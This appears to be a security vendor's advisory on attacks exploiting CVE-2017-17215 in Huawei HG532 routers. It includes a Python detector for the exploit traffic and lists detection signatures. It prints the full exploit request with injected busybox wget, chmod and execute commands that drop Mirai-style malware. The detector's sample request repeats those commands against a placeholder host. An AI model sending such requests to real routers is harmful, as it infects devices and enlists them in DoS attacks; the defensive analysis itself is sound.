New wave of attacks attempting to exploit Huawei home routers

July 1, 2019

SonicWall has observed a new wave of attacks targeting Huawei home routers in an attempt to exploit CVE-2017-17215, a remote command execution vulnerability in the Huawei HG532's UPnP DeviceUpgrade service.
The attack starts by scanning internet-facing IPs on TCP port 37215 and then sending the following POST request to each host that answers:

POST /ctrlt/DeviceUpgrade_1 HTTP/1.1
Content-Length: 430
Connection: keep-alive
Accept: */*
Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
<?xml version="1.0"?>
<s:Envelope xmlns:s="" s:encodingStyle=""><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g -l /tmp/binary -r /bins/mips
/bin/busybox chmod 777 * /tmp/binary
/tmp/binary huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>

Once the vulnerability is exploited successfully, the shell commands injected through the NewStatusURL field are executed on the target router in sequence:

/bin/busybox wget -g -l /tmp/binary -r /bins/mips // Download the payload and save it as /tmp/binary
/bin/busybox chmod 777 * /tmp/binary // Make it executable
/tmp/binary huawei // Execute it

At the time of writing, the malware download site is still active and serving payloads to exploited routers. It hosts builds for a wide range of target architectures, including mips, mpsl, arm, x86, ppc, sh4, m68k and others; the request above fetches the mips build (/bins/mips).
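The request and the injected command sequence above are what a network sensor on TCP/37215 has to recognise. The following detector is an added example, not SonicWall's code or signature logic: it parses a raw HTTP request, confirms it is a POST to the HG532 DeviceUpgrade endpoint, pulls the NewStatusURL/NewDownloadURL fields out of the SOAP body, flags shell command substitution inside them and returns the injected dropper commands. The sample requests at the bottom are constructed; the 192.0.2.x addresses are documentation addresses standing in for the attacker's download host, which the capture above elides.

```python
"""Added example (not SonicWall code): detect CVE-2017-17215 exploit
requests and extract the injected shell commands. Sample requests below
are constructed; 192.0.2.x are placeholder addresses, not a real C2."""
import re
import xml.etree.ElementTree as ET
from dataclasses import dataclass, field

TARGET_PATH = "/ctrlt/DeviceUpgrade_1"
URL_TAGS = ("NewStatusURL", "NewDownloadURL")
# Shell command substitution or chaining has no place inside a URL field.
INJECTION_RE = re.compile(r"\$\(|`|;|\|\||&&")


@dataclass
class Verdict:
    malicious: bool = False
    reasons: list = field(default_factory=list)
    commands: list = field(default_factory=list)


def parse_request(raw: bytes):
    """Split a raw HTTP/1.x request into (method, path, headers, body).
    Assumes a well-formed request line (METHOD SP PATH SP VERSION)."""
    head, _, body = raw.partition(b"\r\n\r\n")
    lines = head.decode("latin-1").split("\r\n")
    method, path, _ = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return method, path, headers, body.decode("latin-1", "replace")


def extract_url_fields(body: str) -> dict:
    """Return {tag: text} for NewStatusURL/NewDownloadURL. Exploit envelopes
    are often not well-formed XML (the observed one declares empty
    namespaces), so fall back to a regex instead of losing the payload."""
    fields = {}
    try:
        for el in ET.fromstring(body.strip()).iter():
            tag = el.tag.rsplit("}", 1)[-1]  # strip any {namespace} prefix
            if tag in URL_TAGS:
                fields[tag] = el.text or ""
    except ET.ParseError:
        for tag in URL_TAGS:
            m = re.search(rf"<{tag}>(.*?)</{tag}>", body, re.S)
            if m:
                fields[tag] = m.group(1)
    return fields


def extract_commands(value: str) -> list:
    """Split the contents of every $(...) substitution into shell lines."""
    cmds = []
    for m in re.finditer(r"\$\((.*?)\)", value, re.S):
        cmds += [ln.strip() for ln in m.group(1).splitlines() if ln.strip()]
    return cmds


def analyse(raw: bytes) -> Verdict:
    """Classify one request; Verdict.commands lists the dropper sequence."""
    v = Verdict()
    method, path, headers, body = parse_request(raw)
    if method != "POST" or path != TARGET_PATH:
        return v  # not the HG532 upgrade endpoint, nothing to inspect
    v.reasons.append(f"POST to {TARGET_PATH}")
    if 'username="dslf-config"' in headers.get("authorization", ""):
        v.reasons.append("Digest auth as dslf-config (account used by the exploit)")
    for tag, value in extract_url_fields(body).items():
        if INJECTION_RE.search(value):
            v.malicious = True
            v.reasons.append(f"shell metacharacters in {tag}")
            v.commands += extract_commands(value)
    return v


def build_request(body: str, auth: str = "") -> bytes:
    """Assemble a raw request with a correct Content-Length (for samples)."""
    head = [f"POST {TARGET_PATH} HTTP/1.1",
            f"Content-Length: {len(body.encode())}",
            "Connection: keep-alive", "Accept: */*"]
    if auth:
        head.append("Authorization: " + auth)
    return ("\r\n".join(head) + "\r\n\r\n" + body).encode()


AUTH = ('Digest username="dslf-config", realm="HuaweiHomeGateway", '
        'uri="/ctrlt/DeviceUpgrade_1", algorithm="MD5"')
ENVELOPE = ('<?xml version="1.0"?>\n'
            '<s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/">'
            '<s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1">'
            '<NewStatusURL>{status}</NewStatusURL><NewDownloadURL>{download}'
            '</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>')
# Constructed sample mirroring the observed payload (host is a placeholder).
MALICIOUS = build_request(ENVELOPE.format(
    status="$(/bin/busybox wget -g 192.0.2.10 -l /tmp/binary -r /bins/mips\n"
           "/bin/busybox chmod 777 * /tmp/binary\n/tmp/binary huawei)",
    download="$(echo HUAWEIUPNP)"), AUTH)
# Constructed upgrade request with plain URLs: same endpoint, no injection.
BENIGN = build_request(ENVELOPE.format(
    status="http://192.0.2.20/status", download="http://192.0.2.20/fw.bin"))

if __name__ == "__main__":
    for name, req in (("malicious", MALICIOUS), ("benign", BENIGN)):
        v = analyse(req)
        print(name, "ALERT" if v.malicious else "ok", v.reasons, v.commands)
```

The XML parser is tried first so that well-formed envelopes are handled properly, but a parse failure must not suppress the alert: the payload seen in the wild declares empty namespaces, which a strict parser rejects, so the regex fallback still recovers the URL fields. On a perimeter device the simpler rule is to drop any internet-side request to /ctrlt/DeviceUpgrade_1 on port 37215 outright; the extraction logic is for analysts who want the download host and dropper sequence from captured traffic.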

When executed, the binary connects to its command-and-control (CnC) server, from which it can receive commands to launch various types of DoS attacks, such as UDP DoS and TCP DoS, against a given target.

SonicWall Capture Labs Threat Research team provides protection against this exploit with the following signatures:

IPS: 13151 Huawei HG532 Remote Command Execution
GAV: (Cloud Id: 71637770) Mirai.O (Trojan)
GAV: (Cloud Id: 71634637) Mirai.O (Trojan)
GAV: (Cloud Id: 71637780) AELtrojan (Trojan)
GAV: (Cloud Id: 71636342) SMMR1 (Trojan)
GAV: (Cloud Id: 71637710) SMMR1 (Trojan)
GAV: (Cloud Id: 71638263) AELtrojan (Trojan)
GAV: (Cloud Id: 71636734) Mirai.O (Trojan)
GAV: (Cloud Id: 71637583) Mirai.O (Trojan)
GAV: (Cloud Id: 71635399) Mirai.O (Trojan)